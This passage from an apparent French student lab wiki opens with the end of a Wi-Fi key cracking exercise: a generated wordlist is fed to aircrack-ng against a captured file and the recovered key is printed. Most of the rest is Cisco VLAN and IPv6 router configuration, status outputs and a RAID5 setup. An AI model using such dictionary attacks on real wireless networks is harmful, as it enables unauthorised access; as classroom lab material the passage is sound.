On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
